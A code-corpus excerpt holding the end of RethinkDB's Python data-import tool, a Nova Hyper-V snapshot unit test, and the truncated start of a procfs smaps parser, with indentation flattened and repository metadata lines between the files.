print(" --table DB.TABLE the table to import the data into")
print(" --format (csv | json) the format of the file (defaults to json)")
print(" --pkey PRIMARY_KEY the field to use as the primary key in the table")
print("")
print("Import CSV format:")
print(" --delimiter CHARACTER character separating fields, or '\\t' for tab")
print(" --no-header do not read in a header of field names")
print(" --custom-header FIELD,FIELD... header to use (overriding file header), must be")
print(" specified if --no-header")
print("")
print("Import JSON format:")
print(" --max-document-size the maximum size in bytes that a single JSON document")
print(" can have (defaults to 134217728).")
print("")
print("EXAMPLES:")
print("")
print("rethinkdb import -d rdb_export -c mnemosyne:39500 --clients 128")
print(" Import data into a cluster running on host 'mnemosyne' with a client port at 39500,")
print(" using 128 client connections and the named export directory.")
print("")
print("rethinkdb import -f site_history.csv --format csv --table test.history --pkey count")
print(" Import data into a local cluster and the table 'history' in the 'test' database,")
print(" using the named CSV file, and using the 'count' field as the primary key.")
print("")
print("rethinkdb import -d rdb_export -c hades -a hunter2 -i test")
print(" Import data into a cluster running on host 'hades' which requires authorization,")
print(" using only the database 'test' from the named export directory.")
print("")
print("rethinkdb import -f subscriber_info.json --fields id,name,hashtag --force")
print(" Import data into a local cluster using the named JSON file, and only the fields")
print(" 'id', 'name', and 'hashtag', overwriting any existing rows with the same primary key.")
print("")
print("rethinkdb import -f user_data.csv --delimiter ';' --no-header --custom-header id,name,number")
print(" Import data into a local cluster using the named CSV file with no header and instead")
print(" use the fields 'id', 'name', and 'number', the delimiter is a semicolon (rather than")
print(" a comma).")
def parse_options():
parser = OptionParser(add_help_option=False, usage=usage)
parser.add_option("-c", "--connect", dest="host", metavar="HOST:PORT", default="localhost:28015", type="string")
parser.add_option("-a", "--auth", dest="auth_key", metavar="AUTHKEY", default="", type="string")
parser.add_option("--fields", dest="fields", metavar="FIELD,FIELD...", default=None, type="string")
parser.add_option("--clients", dest="clients", metavar="NUM_CLIENTS", default=8, type="int")
parser.add_option("--hard-durability", dest="hard", action="store_true", default=False)
parser.add_option("--force", dest="force", action="store_true", default=False)
parser.add_option("--debug", dest="debug", action="store_true", default=False)
parser.add_option("--max-document-size", dest="max_document_size", default=0,type="int")
# Directory import options
parser.add_option("-d", "--directory", dest="directory", metavar="DIRECTORY", default=None, type="string")
parser.add_option("-i", "--import", dest="tables", metavar="DB | DB.TABLE", default=[], action="append", type="string")
parser.add_option("--no-secondary-indexes", dest="create_sindexes", action="store_false", default=True)
# File import options
parser.add_option("-f", "--file", dest="import_file", metavar="FILE", default=None, type="string")
parser.add_option("--format", dest="import_format", metavar="json | csv", default=None, type="string")
parser.add_option("--table", dest="import_table", metavar="DB.TABLE", default=None, type="string")
parser.add_option("--pkey", dest="primary_key", metavar="KEY", default=None, type="string")
parser.add_option("--delimiter", dest="delimiter", metavar="CHARACTER", default=None, type="string")
parser.add_option("--no-header", dest="no_header", action="store_true", default=False)
parser.add_option("--custom-header", dest="custom_header", metavar="FIELD,FIELD...", default=None, type="string")
parser.add_option("-h", "--help", dest="help", default=False, action="store_true")
(options, args) = parser.parse_args()
# Check validity of arguments
if len(args) != 0:
raise RuntimeError("Error: No positional arguments supported. Unrecognized option '%s'" % args[0])
if options.help:
print_import_help()
exit(0)
res = {}
# Verify valid host:port --connect option
(res["host"], res["port"]) = parse_connect_option(options.host)
if options.clients < 1:
raise RuntimeError("Error: --client option too low, must have at least one client connection")
res["auth_key"] = options.auth_key
res["clients"] = options.clients
res["durability"] = "hard" if options.hard else "soft"
res["force"] = options.force
res["debug"] = options.debug
res["create_sindexes"] = options.create_sindexes
# Default behavior for csv files - may be changed by options
res["delimiter"] = ","
res["no_header"] = False
res["custom_header"] = None
# buffer size
if options.max_document_size > 0:
global json_max_buffer_size
json_max_buffer_size=options.max_document_size
if options.directory is not None:
# Directory mode, verify directory import options
if options.import_file is not None:
raise RuntimeError("Error: --file option is not valid when importing a directory")
if options.import_format is not None:
raise RuntimeError("Error: --format option is not valid when importing a directory")
if options.import_table is not None:
raise RuntimeError("Error: --table option is not valid when importing a directory")
if options.primary_key is not None:
raise RuntimeError("Error: --pkey option is not valid when importing a directory")
if options.delimiter is not None:
raise RuntimeError("Error: --delimiter option is not valid when importing a directory")
if options.no_header is not False:
raise RuntimeError("Error: --no-header option is not valid when importing a directory")
if options.custom_header is not None:
raise RuntimeError("Error: --custom-header option is not valid when importing a directory")
# Verify valid directory option
dirname = options.directory
res["directory"] = os.path.abspath(dirname)
if not os.path.exists(res["directory"]):
raise RuntimeError("Error: Directory to import does not exist: %d" % res["directory"])
# Verify valid --import options
res["db_tables"] = parse_db_table_options(options.tables)
# Parse fields
if options.fields is None:
res["fields"] = None
elif len(res["db_tables"]) != 1 or res["db_tables"][0][1] is None:
raise RuntimeError("Error: Can only use the --fields option when importing a single table")
else:
res["fields"] = options.fields.split(",")
elif options.import_file is not None:
# Single file mode, verify file import options
if len(options.tables) != 0:
raise RuntimeError("Error: --import option is not valid when importing a single file")
if options.directory is not None:
raise RuntimeError("Error: --directory option is not valid when importing a single file")
import_file = options.import_file
res["import_file"] = os.path.abspath(import_file)
if not os.path.exists(res["import_file"]):
raise RuntimeError("Error: File to import does not exist: %s" % res["import_file"])
# Verify valid --format option
if options.import_format is None:
options.import_format = os.path.split(options.import_file)[1].split(".")[-1]
if options.import_format not in ["csv", "json"]:
options.import_format = "json"
res["import_format"] = options.import_format
elif options.import_format not in ["csv", "json"]:
raise RuntimeError("Error: Unknown format '%s', valid options are 'csv' and 'json'" % options.import_format)
else:
res["import_format"] = options.import_format
# Verify valid --table option
if options.import_table is None:
raise RuntimeError("Error: Must specify a destination table to import into using the --table option")
res["import_db_table"] = parse_db_table(options.import_table)
if res["import_db_table"][1] is None:
raise RuntimeError("Error: Invalid 'db.table' format: %s" % options.import_table)
# Parse fields
if options.fields is None:
res["fields"] = None
else:
res["fields"] = options.fields.split(",")
if options.import_format == "csv":
if options.delimiter is None:
res["delimiter"] = ","
else:
if len(options.delimiter) == 1:
res["delimiter"] = options.delimiter
elif options.delimiter == "\\t":
res["delimiter"] = "\t"
else:
raise RuntimeError("Error: Must specify only one character for the --delimiter option")
if options.custom_header is None:
res["custom_header"] = None
else:
res["custom_header"] = options.custom_header.split(",")
if options.no_header == True and options.custom_header is None:
raise RuntimeError("Error: Cannot import a CSV file with --no-header and no --custom-header option")
res["no_header"] = options.no_header
else:
if options.delimiter is not None:
raise RuntimeError("Error: --delimiter option is only valid for CSV file formats")
if options.no_header == True:
raise RuntimeError("Error: --no-header option is only valid for CSV file formats")
if options.custom_header is not None:
raise RuntimeError("Error: --custom-header option is only valid for CSV file formats")
res["primary_key"] = options.primary_key
else:
raise RuntimeError("Error: Must specify one of --directory or --file to import")
return res
# This is called through rdb_call_wrapper so reattempts can be tried as long as progress
# is being made, but connection errors occur. We save a failed task in the progress object
# so it can be resumed later on a new connection.
def import_from_queue(progress, conn, task_queue, error_queue, replace_conflicts, durability, write_count):
if progress[0] is not None and not replace_conflicts:
# We were interrupted and it's not ok to overwrite rows, check that the batch either:
# a) does not exist on the server
# b) is exactly the same on the server
task = progress[0]
pkey = r.db(task[0]).table(task[1]).info().run(conn)["primary_key"]
for i in reversed(range(len(task[2]))):
obj = pickle.loads(task[2][i])
if pkey not in obj:
raise RuntimeError("Connection error while importing. Current row has no specified primary key, so cannot guarantee absence of duplicates")
row = r.db(task[0]).table(task[1]).get(obj[pkey]).run(conn)
if row == obj:
write_count[0] += 1
del task[2][i]
else:
raise RuntimeError("Duplicate primary key `%s`:\n%s\n%s" % (pkey, str(obj), str(row)))
task = task_queue.get() if progress[0] is None else progress[0]
while not isinstance(task, StopIteration):
try:
# Unpickle objects (TODO: super inefficient, would be nice if we could pass down json)
objs = [pickle.loads(obj) for obj in task[2]]
conflict_action = 'replace' if replace_conflicts else 'error'
res = r.db(task[0]).table(task[1]).insert(objs, durability=durability, conflict=conflict_action).run(conn)
except:
progress[0] = task
raise
if res["errors"] > 0:
raise RuntimeError("Error when importing into table '%s.%s': %s" %
(task[0], task[1], res["first_error"]))
write_count[0] += len(objs)
task = task_queue.get()
# This is run for each client requested, and accepts tasks from the reader processes
def client_process(host, port, auth_key, task_queue, error_queue, rows_written, replace_conflicts, durability):
try:
conn_fn = lambda: r.connect(host, port, auth_key=auth_key)
write_count = [0]
rdb_call_wrapper(conn_fn, "import", import_from_queue, task_queue, error_queue, replace_conflicts, durability, write_count)
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb)))
# Read until the exit event so the readers do not hang on pushing onto the queue
while not isinstance(task_queue.get(), StopIteration):
pass
with rows_written.get_lock():
rows_written.value += write_count[0]
batch_length_limit = 200
batch_size_limit = 500000
class InterruptedError(Exception):
def __str__(self):
return "Interrupted"
# This function is called for each object read from a file by the reader processes
# and will push tasks to the client processes on the task queue
def object_callback(obj, db, table, task_queue, object_buffers, buffer_sizes, fields, exit_event):
global batch_size_limit
global batch_length_limit
if exit_event.is_set():
raise InterruptedError()
if not isinstance(obj, dict):
raise RuntimeError("Error: Invalid input, expected an object, but got %s" % type(obj))
# filter out fields
if fields is not None:
for key in list(obj.keys()):
if key not in fields:
del obj[key]
# Pickle the object here because we want an accurate size, and it'll pickle anyway for IPC
object_buffers.append(pickle.dumps(obj))
buffer_sizes.append(len(object_buffers[-1]))
if len(object_buffers) >= batch_length_limit or sum(buffer_sizes) > batch_size_limit:
task_queue.put((db, table, object_buffers))
del object_buffers[0:len(object_buffers)]
del buffer_sizes[0:len(buffer_sizes)]
return obj
def read_json_array(json_data, file_in, callback, progress_info,
json_array=True):
decoder = json.JSONDecoder()
file_offset = 0
offset = 0
while True:
try:
offset = json.decoder.WHITESPACE.match(json_data, offset).end()
if json_array and json_data[offset] == "]":
break # End of JSON
(obj, offset) = decoder.raw_decode(json_data, idx=offset)
callback(obj)
# Read past whitespace to the next record
file_offset += offset
json_data = json_data[offset:]
offset = json.decoder.WHITESPACE.match(json_data, 0).end()
if json_array and json_data[offset] == ",":
# Read past the comma
offset = json.decoder.WHITESPACE.match(json_data, offset + 1).end()
elif json_array and json_data[offset] != "]":
raise ValueError("Error: JSON format not recognized - expected ',' or ']' after object")
except (ValueError, IndexError):
before_len = len(json_data)
to_read = max(json_read_chunk_size, before_len)
json_data += file_in.read(min(to_read, json_max_buffer_size - before_len))
if json_array and json_data[offset] == ",":
offset = json.decoder.WHITESPACE.match(json_data, offset + 1).end()
elif (not json_array) and before_len == len(json_data):
break # End of JSON
elif before_len == len(json_data) :
raise
elif len(json_data) >= json_max_buffer_size:
raise ValueError("Error: JSON max buffer size exceeded. Use '--max-document-size' to extend your buffer.")
progress_info[0].value = file_offset
# Read the rest of the file and return it so it can be checked for unexpected data
json_data += file_in.read()
return json_data[offset + 1:]
def json_reader(task_queue, filename, db, table, fields, progress_info, exit_event):
object_buffers = []
buffer_sizes = []
with open(filename, "r") as file_in:
# Scan to the first '[', then load objects one-by-one
# Read in the data in chunks, since the json module would just read the whole thing at once
json_data = file_in.read(json_read_chunk_size)
callback = lambda x: object_callback(x, db, table, task_queue, object_buffers,
buffer_sizes, fields, exit_event)
progress_info[1].value = os.path.getsize(filename)
offset = json.decoder.WHITESPACE.match(json_data, 0).end()
if json_data[offset] in "[{":
json_data = read_json_array(
json_data[offset + (1 if json_data[offset] == "[" else 0):],
file_in, callback, progress_info,
json_data[offset] == "[")
else:
raise RuntimeError("Error: JSON format not recognized - file does not begin with an object or array")
# Make sure only remaining data is whitespace
while len(json_data) > 0:
if json.decoder.WHITESPACE.match(json_data, 0).end() != len(json_data):
raise RuntimeError("Error: JSON format not recognized - extra characters found after end of data")
json_data = file_in.read(json_read_chunk_size)
progress_info[0].value = progress_info[1].value
if len(object_buffers) > 0:
task_queue.put((db, table, object_buffers))
# Wrapper classes for the handling of unicode csv files
# Taken from https://docs.python.org/2/library/csv.html
class Utf8Recoder:
def __init__(self, f):
self.reader = codecs.getreader('utf-8')(f)
def __iter__(self):
return self
def next(self):
return self.reader.next().encode("utf-8")
class Utf8CsvReader:
def __init__(self, f, **kwargs):
f = Utf8Recoder(f)
self.reader = csv.reader(f, **kwargs)
self.line_num = self.reader.line_num
def next(self):
row = self.reader.next()
self.line_num = self.reader.line_num
return [unicode(s, 'utf-8') for s in row]
def __iter__(self):
return self
def open_csv_file(filename):
if PY3:
return open(filename, 'r', encoding='utf-8', newline='')
else:
return open(filename, 'r')
def csv_reader(task_queue, filename, db, table, options, progress_info, exit_event):
object_buffers = []
buffer_sizes = []
# Count the lines so we can report progress
# TODO: this requires us to make two passes on csv files
line_count = 0
with open_csv_file(filename) as file_in:
for i, l in enumerate(file_in):
pass
line_count = i + 1
progress_info[1].value = line_count
with open_csv_file(filename) as file_in:
if PY3:
reader = csv.reader(file_in, delimiter=options["delimiter"])
else:
reader = Utf8CsvReader(file_in, delimiter=options["delimiter"])
if not options["no_header"]:
fields_in = next(reader)
# Field names may override fields from the header
if options["custom_header"] is not None:
if not options["no_header"]:
print("Ignoring header row: %s" % str(fields_in))
fields_in = options["custom_header"]
elif options["no_header"]:
raise RuntimeError("Error: No field name information available")
for row in reader:
file_line = reader.line_num
progress_info[0].value = file_line
if len(fields_in) != len(row):
raise RuntimeError("Error: File '%s' line %d has an inconsistent number of columns" % (filename, file_line))
# We import all csv fields as strings (since we can't assume the type of the data)
obj = dict(zip(fields_in, row))
for key in list(obj.keys()): # Treat empty fields as no entry rather than empty string
if len(obj[key]) == 0:
del obj[key]
object_callback(obj, db, table, task_queue, object_buffers, buffer_sizes, options["fields"], exit_event)
if len(object_buffers) > 0:
task_queue.put((db, table, object_buffers))
# This function is called through rdb_call_wrapper, which will reattempt if a connection
# error occurs. Progress will resume where it left off.
def create_table(progress, conn, db, table, pkey, sindexes):
if table not in r.db(db).table_list().run(conn):
r.db(db).table_create(table, primary_key=pkey).run(conn)
if progress[0] is None:
progress[0] = 0
# Recreate secondary indexes - assume that any indexes that already exist are wrong
# and create them from scratch
indexes = r.db(db).table(table).index_list().run(conn)
created_indexes = list()
for sindex in sindexes[progress[0]:]:
if isinstance(sindex, dict) and all(k in sindex for k in ('index', 'function')):
if sindex['index'] in indexes:
r.db(db).table(table).index_drop(sindex['index']).run(conn)
r.db(db).table(table).index_create(sindex['index'], sindex['function']).run(conn)
created_indexes.append(sindex['index'])
progress[0] += 1
r.db(db).table(table).index_wait(r.args(created_indexes)).run(conn)
def table_reader(options, file_info, task_queue, error_queue, progress_info, exit_event):
try:
db = file_info["db"]
table = file_info["table"]
primary_key = file_info["info"]["primary_key"]
conn_fn = lambda: r.connect(options["host"], options["port"], auth_key=options["auth_key"])
rdb_call_wrapper(conn_fn, "create table", create_table, db, table, primary_key,
file_info["info"]["indexes"] if options["create_sindexes"] else [])
if file_info["format"] == "json":
json_reader(task_queue,
file_info["file"],
db, table,
options["fields"],
progress_info,
exit_event)
elif file_info["format"] == "csv":
csv_reader(task_queue,
file_info["file"],
db, table,
options,
progress_info,
exit_event)
else:
raise RuntimeError("Error: Unknown file format specified")
except InterruptedError:
pass # Don't save interrupted errors, they are side-effects
except:
ex_type, ex_class, tb = sys.exc_info()
error_queue.put((ex_type, ex_class, traceback.extract_tb(tb), file_info["file"]))
def abort_import(signum, frame, parent_pid, exit_event, task_queue, clients, interrupt_event):
# Only do the abort from the parent process
if os.getpid() == parent_pid:
interrupt_event.set()
exit_event.set()
def print_progress(ratio):
total_width = 40
done_width = int(ratio * total_width)
undone_width = total_width - done_width
print("\r[%s%s] %3d%%" % ("=" * done_width, " " * undone_width, int(100 * ratio)), end=' ')
sys.stdout.flush()
def update_progress(progress_info):
lowest_completion = 1.0
for current, max_count in progress_info:
curr_val = current.value
max_val = max_count.value
if curr_val < 0:
lowest_completion = 0.0
elif max_val <= 0:
lowest_completion = 1.0
else:
lowest_completion = min(lowest_completion, float(curr_val) / max_val)
print_progress(lowest_completion)
def spawn_import_clients(options, files_info):
# Spawn one reader process for each db.table, as well as many client processes
task_queue = SimpleQueue()
error_queue = SimpleQueue()
exit_event = multiprocessing.Event()
interrupt_event = multiprocessing.Event()
errors = []
reader_procs = []
client_procs = []
parent_pid = os.getpid()
signal.signal(signal.SIGINT, lambda a, b: abort_import(a, b, parent_pid, exit_event, task_queue, client_procs, interrupt_event))
try:
progress_info = []
rows_written = multiprocessing.Value(ctypes.c_longlong, 0)
for i in xrange(options["clients"]):
client_procs.append(multiprocessing.Process(target=client_process,
args=(options["host"],
options["port"],
options["auth_key"],
task_queue,
error_queue,
rows_written,
options["force"],
options["durability"])))
client_procs[-1].start()
for file_info in files_info:
progress_info.append((multiprocessing.Value(ctypes.c_longlong, -1), # Current lines/bytes processed
multiprocessing.Value(ctypes.c_longlong, 0))) # Total lines/bytes to process
reader_procs.append(multiprocessing.Process(target=table_reader,
args=(options,
file_info,
task_queue,
error_queue,
progress_info[-1],
exit_event)))
reader_procs[-1].start()
# Wait for all reader processes to finish - hooray, polling
while len(reader_procs) > 0:
time.sleep(0.1)
# If an error has occurred, exit out early
while not error_queue.empty():
exit_event.set()
errors.append(error_queue.get())
reader_procs = [proc for proc in reader_procs if proc.is_alive()]
update_progress(progress_info)
# Wait for all clients to finish
alive_clients = sum([client.is_alive() for client in client_procs])
for i in xrange(alive_clients):
task_queue.put(StopIteration())
while len(client_procs) > 0:
time.sleep(0.1)
client_procs = [client for client in client_procs if client.is_alive()]
# If we were successful, make sure 100% progress is reported
if len(errors) == 0 and not interrupt_event.is_set():
print_progress(1.0)
def plural(num, text):
return "%d %s%s" % (num, text, "" if num == 1 else "s")
# Continue past the progress output line
print("")
print("%s imported in %s" % (plural(rows_written.value, "row"),
plural(len(files_info), "table")))
finally:
signal.signal(signal.SIGINT, signal.SIG_DFL)
if interrupt_event.is_set():
raise RuntimeError("Interrupted")
if len(errors) != 0:
# multiprocessing queues don't handling tracebacks, so they've already been stringified in the queue
for error in errors:
print("%s" % error[1], file=sys.stderr)
if options["debug"]:
print("%s traceback: %s" % (error[0].__name__, error[2]), file=sys.stderr)
if len(error) == 4:
print("In file: %s" % error[3], file=sys.stderr)
raise RuntimeError("Errors occurred during import")
def get_import_info_for_file(filename, db_table_filter):
file_info = {}
file_info["file"] = filename
file_info["format"] = os.path.split(filename)[1].split(".")[-1]
file_info["db"] = os.path.split(os.path.split(filename)[0])[1]
file_info["table"] = os.path.split(filename)[1].split(".")[0]
if len(db_table_filter) > 0:
if (file_info["db"], None) not in db_table_filter:
if (file_info["db"], file_info["table"]) not in db_table_filter:
return None
info_filepath = os.path.join(os.path.split(filename)[0], file_info["table"] + ".info")
with open(info_filepath, "r") as info_file:
file_info["info"] = json.load(info_file)
return file_info
def tables_check(progress, conn, files_info, force):
# Ensure that all needed databases exist and tables don't
db_list = r.db_list().run(conn)
for db in set([file_info["db"] for file_info in files_info]):
if db == "rethinkdb":
raise RuntimeError("Error: Cannot import tables into the system database: 'rethinkdb'")
if db not in db_list:
r.db_create(db).run(conn)
# Ensure that all tables do not exist (unless --forced)
already_exist = []
for file_info in files_info:
table = file_info["table"]
db = file_info["db"]
if table in r.db(db).table_list().run(conn):
if not force:
already_exist.append("%s.%s" % (db, table))
extant_pkey = r.db(db).table(table).info().run(conn)["primary_key"]
if file_info["info"]["primary_key"] != extant_pkey:
raise RuntimeError("Error: Table '%s.%s' already exists with a different primary key" % (db, table))
return already_exist
def import_directory(options):
# Scan for all files, make sure no duplicated tables with different formats
dbs = False
db_filter = set([db_table[0] for db_table in options["db_tables"]])
files_to_import = []
files_ignored = []
for root, dirs, files in os.walk(options["directory"]):
if not dbs:
files_ignored.extend([os.path.join(root, f) for f in files])
# The first iteration through should be the top-level directory, which contains the db folders
dbs = True
if len(db_filter) > 0:
for i in reversed(xrange(len(dirs))):
if dirs[i] not in db_filter:
del dirs[i]
else:
if len(dirs) != 0:
files_ignored.extend([os.path.join(root, d) for d in dirs])
del dirs[0:len(dirs)]
for f in files:
split_file = f.split(".")
if len(split_file) != 2 or split_file[1] not in ["json", "csv", "info"]:
files_ignored.append(os.path.join(root, f))
elif split_file[1] == "info":
pass # Info files are included based on the data files
elif not os.access(os.path.join(root, split_file[0] + ".info"), os.F_OK):
files_ignored.append(os.path.join(root, f))
else:
files_to_import.append(os.path.join(root, f))
# For each table to import collect: file, format, db, table, info
files_info = []
for filename in files_to_import:
res = get_import_info_for_file(filename, options["db_tables"])
if res is not None:
files_info.append(res)
# Ensure no two files are for the same db/table, and that all formats are recognized
db_tables = set()
for file_info in files_info:
if (file_info["db"], file_info["table"]) in db_tables:
raise RuntimeError("Error: Duplicate db.table found in directory tree: %s.%s" % (file_info["db"], file_info["table"]))
if file_info["format"] not in ["csv", "json"]:
raise RuntimeError("Error: Unrecognized format for file %s" % file_info["file"])
db_tables.add((file_info["db"], file_info["table"]))
conn_fn = lambda: r.connect(options["host"], options["port"], auth_key=options["auth_key"])
# Make sure this isn't a pre-`reql_admin` cluster - which could result in data loss
# if the user has a database named 'rethinkdb'
rdb_call_wrapper(conn_fn, "version check", check_minimum_version, (1, 16, 0))
already_exist = rdb_call_wrapper(conn_fn, "tables check", tables_check, files_info, options["force"])
if len(already_exist) == 1:
raise RuntimeError("Error: Table '%s' already exists, run with --force to import into the existing table" % already_exist[0])
elif len(already_exist) > 1:
already_exist.sort()
extant_tables = "\n ".join(already_exist)
raise RuntimeError("Error: The following tables already exist, run with --force to import into the existing tables:\n %s" % extant_tables)
# Warn the user about the files that were ignored
if len(files_ignored) > 0:
print("Unexpected files found in the specified directory. Importing a directory expects", file=sys.stderr)
print(" a directory from `rethinkdb export`. If you want to import individual tables", file=sys.stderr)
print(" import them as single files. The following files were ignored:", file=sys.stderr)
for f in files_ignored:
print("%s" % str(f), file=sys.stderr)
spawn_import_clients(options, files_info)
def table_check(progress, conn, db, table, pkey, force):
if db == "rethinkdb":
raise RuntimeError("Error: Cannot import a table into the system database: 'rethinkdb'")
if db not in r.db_list().run(conn):
r.db_create(db).run(conn)
if table in r.db(db).table_list().run(conn):
if not force:
raise RuntimeError("Error: Table already exists, run with --force if you want to import into the existing table")
extant_pkey = r.db(db).table(table).info().run(conn)["primary_key"]
if pkey is not None and pkey != extant_pkey:
raise RuntimeError("Error: Table already exists with a different primary key")
pkey = extant_pkey
else:
if pkey is None:
print("no primary key specified, using default primary key when creating table")
r.db(db).table_create(table).run(conn)
else:
r.db(db).table_create(table, primary_key=pkey).run(conn)
return pkey
def import_file(options):
db = options["import_db_table"][0]
table = options["import_db_table"][1]
pkey = options["primary_key"]
# Ensure that the database and table exist with the right primary key
conn_fn = lambda: r.connect(options["host"], options["port"], auth_key=options["auth_key"])
# Make sure this isn't a pre-`reql_admin` cluster - which could result in data loss
# if the user has a database named 'rethinkdb'
rdb_call_wrapper(conn_fn, "version check", check_minimum_version, (1, 16, 0))
pkey = rdb_call_wrapper(conn_fn, "table check", table_check, db, table, pkey, options["force"])
# Make this up so we can use the same interface as with an import directory
file_info = {}
file_info["file"] = options["import_file"]
file_info["format"] = options["import_format"]
file_info["db"] = db
file_info["table"] = table
file_info["info"] = {"primary_key": pkey, "indexes": []}
spawn_import_clients(options, [file_info])
def main():
try:
options = parse_options()
except RuntimeError as ex:
print("Usage:\n%s" % usage, file=sys.stderr)
print(ex, file=sys.stderr)
return 1
try:
start_time = time.time()
if "directory" in options:
import_directory(options)
elif "import_file" in options:
import_file(options)
else:
raise RuntimeError("Error: Neither --directory or --file specified")
except RuntimeError as ex:
print(ex, file=sys.stderr)
return 1
print(" Done (%d seconds)" % (time.time() - start_time))
return 0
if __name__ == "__main__":
exit(main())
| agpl-3.0 |
watonyweng/nova | nova/tests/unit/virt/hyperv/test_snapshotops.py | 67 | 5891 | # Copyright 2014 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from nova.compute import task_states
from nova.tests.unit import fake_instance
from nova.tests.unit.virt.hyperv import test_base
from nova.virt.hyperv import snapshotops
class SnapshotOpsTestCase(test_base.HyperVBaseTestCase):
"""Unit tests for the Hyper-V SnapshotOps class."""
def setUp(self):
super(SnapshotOpsTestCase, self).setUp()
self.context = 'fake_context'
self._snapshotops = snapshotops.SnapshotOps()
self._snapshotops._pathutils = mock.MagicMock()
self._snapshotops._vmutils = mock.MagicMock()
self._snapshotops._vhdutils = mock.MagicMock()
@mock.patch('nova.image.glance.get_remote_image_service')
def test_save_glance_image(self, mock_get_remote_image_service):
image_metadata = {"is_public": False,
"disk_format": "vhd",
"container_format": "bare",
"properties": {}}
glance_image_service = mock.MagicMock()
mock_get_remote_image_service.return_value = (glance_image_service,
mock.sentinel.IMAGE_ID)
self._snapshotops._save_glance_image(context=self.context,
image_id=mock.sentinel.IMAGE_ID,
image_vhd_path=mock.sentinel.PATH)
mock_get_remote_image_service.assert_called_once_with(
self.context, mock.sentinel.IMAGE_ID)
self._snapshotops._pathutils.open.assert_called_with(
mock.sentinel.PATH, 'rb')
glance_image_service.update.assert_called_once_with(
self.context, mock.sentinel.IMAGE_ID, image_metadata,
self._snapshotops._pathutils.open().__enter__())
@mock.patch('nova.virt.hyperv.snapshotops.SnapshotOps._save_glance_image')
def _test_snapshot(self, mock_save_glance_image, base_disk_path):
mock_instance = fake_instance.fake_instance_obj(self.context)
mock_update = mock.MagicMock()
fake_src_path = os.path.join('fake', 'path')
self._snapshotops._pathutils.lookup_root_vhd_path.return_value = (
fake_src_path)
fake_exp_dir = os.path.join(os.path.join('fake', 'exp'), 'dir')
self._snapshotops._pathutils.get_export_dir.return_value = fake_exp_dir
self._snapshotops._vhdutils.get_vhd_parent_path.return_value = (
base_disk_path)
fake_snapshot_path = (
self._snapshotops._vmutils.take_vm_snapshot.return_value)
self._snapshotops.snapshot(context=self.context,
instance=mock_instance,
image_id=mock.sentinel.IMAGE_ID,
update_task_state=mock_update)
self._snapshotops._vmutils.take_vm_snapshot.assert_called_once_with(
mock_instance.name)
mock_lookup_path = self._snapshotops._pathutils.lookup_root_vhd_path
mock_lookup_path.assert_called_once_with(mock_instance.name)
mock_get_vhd_path = self._snapshotops._vhdutils.get_vhd_parent_path
mock_get_vhd_path.assert_called_once_with(fake_src_path)
self._snapshotops._pathutils.get_export_dir.assert_called_once_with(
mock_instance.name)
expected = [mock.call(fake_src_path,
os.path.join(fake_exp_dir,
os.path.basename(fake_src_path)))]
dest_vhd_path = os.path.join(fake_exp_dir,
os.path.basename(fake_src_path))
if base_disk_path:
basename = os.path.basename(base_disk_path)
base_dest_disk_path = os.path.join(fake_exp_dir, basename)
expected.append(mock.call(base_disk_path, base_dest_disk_path))
mock_reconnect = self._snapshotops._vhdutils.reconnect_parent_vhd
mock_reconnect.assert_called_once_with(dest_vhd_path,
base_dest_disk_path)
self._snapshotops._vhdutils.merge_vhd.assert_called_once_with(
dest_vhd_path, base_dest_disk_path)
mock_save_glance_image.assert_called_once_with(
self.context, mock.sentinel.IMAGE_ID, base_dest_disk_path)
else:
mock_save_glance_image.assert_called_once_with(
self.context, mock.sentinel.IMAGE_ID, dest_vhd_path)
self._snapshotops._pathutils.copyfile.has_calls(expected)
expected_update = [
mock.call(task_state=task_states.IMAGE_PENDING_UPLOAD),
mock.call(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)]
mock_update.has_calls(expected_update)
self._snapshotops._vmutils.remove_vm_snapshot.assert_called_once_with(
fake_snapshot_path)
self._snapshotops._pathutils.rmtree.assert_called_once_with(
fake_exp_dir)
def test_snapshot(self):
base_disk_path = os.path.join('fake', 'disk')
self._test_snapshot(base_disk_path=base_disk_path)
def test_snapshot_no_base_disk(self):
self._test_snapshot(base_disk_path=None)
| apache-2.0 |
darrengarvey/procfs-snapshot | parsers/smaps.py | 1 | 3160 | from model import MemoryRegion
import util
import re
def parse_smaps_header(header):
info = MemoryRegion(free=False)
# Example line is:
# 011e6000-01239000 rw-p 00000000 00:00 0 [heap]
# 8ec00000-8ec01000 rw-s 00000000 00:14 20 /dev/shm/NS2371 (deleted)
# All numbers are hex except for the inode
parts = header.split()
util.LOGGER.debug('Parsing smaps header %s' % header)
# Parse the address range
info.start_addr, info.end_addr = [long(x, 16) for x in parts[0].split('-')]
# Parse the permissions
permissions = parts[1]
info.permissions.readable = "r" in permissions
info.permissions.writable = "w" in permissions
info.permissions.executable = "x" in permissions
info.permissions.private = "p" in permissions
info.permissions.shared = "s" in permissions
info.offset = long(parts[2], 16)
# eg. 08:06
info.major_dev, info.minor_dev = [int(x, 16) for x in parts[3].split(':')]
# The inode isn't a hex number
info.inode = int(parts[4])
# eg. [heap]
# or /dev/shm/NS2371
if len(parts) > 5:
info.name = parts[5]
info.deleted = header.endswith('(deleted)')
return info
_header_re = re.compile('^[0-9a-zA-Z]+-[0-9a-zA-Z]+ .*')
def is_memory_region_header(line):
return re.match(_header_re, line)
def parse_smaps_memory_region(pid, lines, has_header=True):
"""Parse a whole smaps region, which may look like:
7f5c8550e000-7f5c85554000 r--p 00000000 08:06 1309629 /fonts/Arial_Bold.ttf
Size: 280 kB
Rss: 152 kB
Pss: 86 kB
Shared_Clean: 132 kB
Shared_Dirty: 12 kB
Private_Clean: 20 kB
Private_Dirty: 1 kB
Referenced: 152 kB
Anonymous: 2 kB
AnonHugePages: 3 kB
Shared_Hugetlb: 4 kB
Private_Hugetlb: 5 kB
Swap: 6 kB
SwapPss: 7 kB
KernelPageSize: 8 kB
MMUPageSize: 9 kB
Locked: 10 kB
